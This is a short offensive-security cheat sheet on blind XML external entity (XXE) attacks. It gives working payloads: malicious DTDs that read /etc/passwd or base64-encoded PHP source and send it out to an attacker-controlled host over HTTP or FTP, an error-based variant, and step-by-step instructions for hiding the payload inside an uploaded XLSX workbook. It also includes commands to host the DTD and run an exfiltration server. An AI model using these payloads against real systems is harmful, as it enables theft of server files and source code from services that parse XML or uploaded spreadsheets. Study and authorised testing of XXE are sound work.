Blind XXE

Last modified: 2023-06-10

XXE Web

XXE is a type of vulnerability that allows an attacker to inject and execute malicious XML code on a server that parses XML input, without directly receiving any feedback or response from the server.

Data Exfiltration via Out-Of-Band

1. Create a Malicious DTD

We need to prepare the dtd file (named "exploit.dtd" here) to retrieve the target file.
Replace the ip address with your own.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php" -->
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.0.1/?x=%file;'>">
%eval;
%exfiltrate;

Then host it on web server.

sudo python3 -m http.server 80

2. Insert XXE

In http request body, insert the following XXE payload.
Same as above DTD, replace the ip address with your own

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.0.0.1/exploit.dtd"> %xxe;]>

Now send request. We might retrieve the local file of the target system via web server.



Data Exfiltration via Out-Of-Band (Error-based)

If the website shows error messages when performing XXE, we can use the following malicious DTD.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

For the rest, please refer to the section above.



Inside XLSX File

An XLSX file is a Microsoft Excel spreadsheet.


1. Create a XLSX File

First we need to create a XLSX file using some software such as LibreOffice Calc.


2. Extract the XLSX File

7z -oXXE xxe.xlsx
cd XXE

We should get files such as “.xml”.


3. Add Blind XXE Payload in the XML File.

Insert the following payload into the xl/workbook.xml.
Replace the “10.0.0.1” with your local ip address.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.0.0.1/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">

4. Rebuild the XLSX File.

cd XXE
7z u ../xxe.xlsx *

5. Create XXE inside a DTD File

Create “xxe.dtd”.
Replace “10.0.0.1” with your local ip address.

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.0.0.1:2121/%d;'>">

6. Start a local server

Serve the DTD file using xxeserv.

git clone https://github.com/staaldraad/xxeserv.git
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000

In another terminal, start a web server in the directory where “xxe.dtd” located.

sudo python3 -m http.server 80

Now upload “xxe.xlsx” file in the website. We should get the content of the desired file.

References